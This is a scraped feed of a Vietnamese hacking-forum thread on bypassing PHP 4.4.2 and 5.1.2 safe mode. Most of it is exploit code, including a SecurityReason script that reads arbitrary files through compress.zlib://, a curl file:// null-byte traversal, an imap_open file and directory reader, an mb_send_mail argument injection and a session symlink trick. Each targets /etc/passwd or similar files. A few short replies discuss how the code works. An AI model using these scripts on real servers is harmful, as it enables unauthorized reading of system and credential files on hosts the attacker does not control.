<![CDATA[Latest posts for the topic "PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass Code:
<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by Maksymilian Arciemowicz SecurityReason.Com
cxib [at] securityreason [dot] com and max [at] jestsuper [dot] pl
pozdro sp3x
*/


$file=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp



echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like
?file=/etc/passwd\n <B><CENTER><FONT
COLOR=\"RED\">SecurityReason.Com
Exploit</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}

$temp=tempnam($tymczas, "cx");

if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "<B>--- Start File ".htmlspecialchars($file)."
-------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File
".htmlspecialchars($file)." ---------------\n";
unlink($temp);
die("\n<FONT COLOR=\"RED\"><B>File
".htmlspecialchars($file)." has been already loaded. SecurityReason Team
;]</B></FONT>");
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($file)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
?>
]]> /hvaonline/posts/list/3673.html#21297 /hvaonline/posts/list/3673.html#21297 GMT PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass Code:
<?
$ch =
curl_init("file:///etc/passwd\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
]]> /hvaonline/posts/list/3673.html#21324 /hvaonline/posts/list/3673.html#21324 GMT PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass Code:
<form action="" method="post">
<select name="switch">
<option selected="selected" value="file">View file</option>
<option value="dir">View dir</option>
</select>
<input type="text" size="60" name="string">
<input type="submit" value="go">
</form>

<?php
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

if ($string && $switch == "file") {
$stream = imap_open($string, "", "");
if ($stream == FALSE)
die("Can't open imap stream");

$str = imap_body($stream, 1);
if (!empty($str))
echo "<pre>".$str."</pre>";
imap_close($stream);
} elseif ($string && $switch == "dir") {
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
die("Can't open imap stream");

$string = explode("|",$string);
if (count($string) > 1)
$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), "*");
echo "<pre>";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]\n";
echo "</pre>";
imap_close($stream);
}
?>
]]> /hvaonline/posts/list/3673.html#21325 /hvaonline/posts/list/3673.html#21325 GMT PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass <?php $rek= "hehehehe"; if (file_exists($rek)) unlink($rek); $file = "/etc/passwd"; $xploit = "-C ".$file." -X ".getcwd()."/".$rek; mb_send_mail(NULL, NULL, NULL, NULL, $xploit); echo "<pre>".file_get_contents($file)."</pre>"; ?>   ]]> /hvaonline/posts/list/3673.html#21327 /hvaonline/posts/list/3673.html#21327 GMT PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass 1) Make the following script: <?php ini_set("session.save_path","/path/where/sess_foo/symlink/is/"); session_start(); $_SESSION['bar'] = "bar"; session_write_close(); ?> 2) Call this script with ?PHPSESSID=foo   ]]> /hvaonline/posts/list/3673.html#21328 /hvaonline/posts/list/3673.html#21328 GMT PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass /hvaonline/posts/list/3673.html#27417 /hvaonline/posts/list/3673.html#27417 GMT Re: PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass /hvaonline/posts/list/3673.html#27452 /hvaonline/posts/list/3673.html#27452 GMT Re: PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass /hvaonline/posts/list/3673.html#39169 /hvaonline/posts/list/3673.html#39169 GMT Re: PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass /hvaonline/posts/list/3673.html#39193 /hvaonline/posts/list/3673.html#39193 GMT Re: PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass

hackernohat wrote:
He he tui có một cách giản đơn hơn cả luke readfile("/etc/passwd"); Chấp cả Safe_mode vì đây là một hàm khá thông dụng trong việc đọc file nên ít server dám chặn nó :mrgreen:  
vậy là pác chưa thấy quan tài rồi :evil: nhiều srv dùng readfile thì cũng pó thôi ]]> /hvaonline/posts/list/3673.html#39300 /hvaonline/posts/list/3673.html#39300 GMT PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass /hvaonline/posts/list/3673.html#58093 /hvaonline/posts/list/3673.html#58093 GMT PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass

baothu wrote:
nữa nè,qua CURL Code:
<?
$ch =
curl_init("file:///etc/passwd\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
?>
 
Cậu có thể phân tích kĩ code này không? Tại sao lại dùng cái này thế: Code:
curl_init("file:///etc/passwd\x00/../../../../../../../../../../../../".__FILE__);
mà không dùng cái này: Code:
curl_init("file://etc/passwd\x00/../../../../../../../../../../../../".__FILE__);
và cái này : Code:
curl_init("file:///etc/passwd/../../../../../../../../../../../../".__FILE__);
Giải thích cho mình rõ được không??? Ko hiểu lắm mặc dù đã đọc tài liệu. ]]> /hvaonline/posts/list/3673.html#62727 /hvaonline/posts/list/3673.html#62727 GMT Sử dụng code bypass PHP /hvaonline/posts/list/3673.html#228871 /hvaonline/posts/list/3673.html#228871 GMT PHP 4.4.2 and PHP 5.1.2 Safe Mode Bypass /hvaonline/posts/list/3673.html#228873 /hvaonline/posts/list/3673.html#228873 GMT